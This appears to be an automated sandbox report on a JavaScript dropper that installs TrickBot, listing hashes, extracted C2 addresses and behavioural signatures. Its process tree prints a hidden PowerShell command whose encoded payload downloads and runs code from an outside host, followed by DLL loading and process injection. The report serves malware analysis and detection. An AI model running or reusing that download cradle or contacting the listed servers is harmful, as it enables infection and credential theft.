Analysis
-
max time kernel
41s -
max time network
144s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
20-07-2021 16:28
Static task
static1
Behavioral task
behavioral1
Sample
32.js
Resource
win7v20210410
General
-
Target
32.js
-
Size
463KB
-
MD5
8f545d23b3544ed3e79ac481de6d2e35
-
SHA1
2232a67e54f505fbd1d70ae0e18db1f8ed0b307d
-
SHA256
97e2a97f378f9af38427493fb965461310ee42dd8d74725223073b8fd0f77e65
-
SHA512
ef0df34055533efc390798bfe0c3875f0bfb5a975012ff77915e4f64c21e4eaf0abdbdeac4d85c74c73dbac9c6744cf4dbe905dc44d089179969516be804d1be
Malware Config
Extracted
http://109.248.201.26/lovemetertok.php
Extracted
trickbot
100018
rob109
38.110.103.124:443
185.56.76.28:443
204.138.26.60:443
60.51.47.65:443
74.85.157.139:443
68.69.26.182:443
38.110.103.136:443
38.110.103.18:443
138.34.28.219:443
185.56.76.94:443
217.115.240.248:443
24.162.214.166:443
80.15.2.105:443
154.58.23.192:443
38.110.100.104:443
45.36.99.184:443
185.56.76.108:443
185.56.76.72:443
138.34.28.35:443
97.83.40.67:443
38.110.103.113:443
38.110.100.142:443
184.74.99.214:443
103.105.254.17:443
62.99.76.213:443
82.159.149.52:443
38.110.100.33:443
38.110.100.242:443
185.13.79.3:443
-
autorunName:pwgrabbName:pwgrabc
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 11 2328 powershell.exe 12 2328 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 2336 rundll32.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 19 wtfismyip.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2328 powershell.exe 2328 powershell.exe 2328 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewermgr.exedescription pid process Token: SeDebugPrivilege 2328 powershell.exe Token: SeDebugPrivilege 3568 wermgr.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
wscript.execmd.exepowershell.exerundll32.exerundll32.exedescription pid process target process PID 664 wrote to memory of 204 664 wscript.exe cmd.exe PID 664 wrote to memory of 204 664 wscript.exe cmd.exe PID 204 wrote to memory of 2328 204 cmd.exe powershell.exe PID 204 wrote to memory of 2328 204 cmd.exe powershell.exe PID 2328 wrote to memory of 1148 2328 powershell.exe rundll32.exe PID 2328 wrote to memory of 1148 2328 powershell.exe rundll32.exe PID 1148 wrote to memory of 2336 1148 rundll32.exe rundll32.exe PID 1148 wrote to memory of 2336 1148 rundll32.exe rundll32.exe PID 1148 wrote to memory of 2336 1148 rundll32.exe rundll32.exe PID 2336 wrote to memory of 764 2336 rundll32.exe cmd.exe PID 2336 wrote to memory of 764 2336 rundll32.exe cmd.exe PID 2336 wrote to memory of 764 2336 rundll32.exe cmd.exe PID 2336 wrote to memory of 3568 2336 rundll32.exe wermgr.exe PID 2336 wrote to memory of 3568 2336 rundll32.exe wermgr.exe PID 2336 wrote to memory of 3568 2336 rundll32.exe wermgr.exe PID 2336 wrote to memory of 3568 2336 rundll32.exe wermgr.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\32.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\KjVwfSl.bin,StartW4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\KjVwfSl.bin,StartW5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe6⤵
-
C:\Windows\system32\wermgr.exeC:\Windows\system32\wermgr.exe6⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\KjVwfSl.binMD5
917e3c54104affcbe521e23e85517bb0
SHA11bffd59bd2618f7ef810c02e9ddbc2011949e251
SHA256d06c5ec5cefe2c6b80bf532cae9c270f2e25f0f2c5e6b05cffa36fe8a17dac3c
SHA51240e769e1f1c9d2531485fa9ac0e55d8c7b04486f32884d636ea0f08c26f702232be8ba11d6299722a3117b7bb08344c63a3bb375f7ef74b030663ca3bd411a0e
-
\Users\Admin\AppData\Local\Temp\KjVwfSl.binMD5
917e3c54104affcbe521e23e85517bb0
SHA11bffd59bd2618f7ef810c02e9ddbc2011949e251
SHA256d06c5ec5cefe2c6b80bf532cae9c270f2e25f0f2c5e6b05cffa36fe8a17dac3c
SHA51240e769e1f1c9d2531485fa9ac0e55d8c7b04486f32884d636ea0f08c26f702232be8ba11d6299722a3117b7bb08344c63a3bb375f7ef74b030663ca3bd411a0e
-
memory/204-114-0x0000000000000000-mapping.dmp
-
memory/1148-133-0x0000000000000000-mapping.dmp
-
memory/2328-131-0x000002C0DC303000-0x000002C0DC305000-memory.dmpFilesize
8KB
-
memory/2328-115-0x0000000000000000-mapping.dmp
-
memory/2328-132-0x000002C0DC306000-0x000002C0DC308000-memory.dmpFilesize
8KB
-
memory/2328-125-0x000002C0DC490000-0x000002C0DC491000-memory.dmpFilesize
4KB
-
memory/2328-120-0x000002C0C4170000-0x000002C0C4171000-memory.dmpFilesize
4KB
-
memory/2328-130-0x000002C0DC300000-0x000002C0DC302000-memory.dmpFilesize
8KB
-
memory/2336-143-0x0000000000F40000-0x0000000000F77000-memory.dmpFilesize
220KB
-
memory/2336-138-0x00000000004D0000-0x000000000050B000-memory.dmpFilesize
236KB
-
memory/2336-141-0x0000000000F00000-0x0000000000F39000-memory.dmpFilesize
228KB
-
memory/2336-136-0x0000000000000000-mapping.dmp
-
memory/2336-146-0x0000000000F80000-0x0000000000FC4000-memory.dmpFilesize
272KB
-
memory/2336-145-0x0000000000DC0000-0x0000000000DF8000-memory.dmpFilesize
224KB
-
memory/2336-147-0x0000000000FF0000-0x0000000000FF1000-memory.dmpFilesize
4KB
-
memory/2336-148-0x0000000000FD1000-0x0000000000FD3000-memory.dmpFilesize
8KB
-
memory/3568-149-0x0000000000000000-mapping.dmp
-
memory/3568-151-0x00000195756C0000-0x00000195756C1000-memory.dmpFilesize
4KB
-
memory/3568-150-0x00000195755A0000-0x00000195755C8000-memory.dmpFilesize
160KB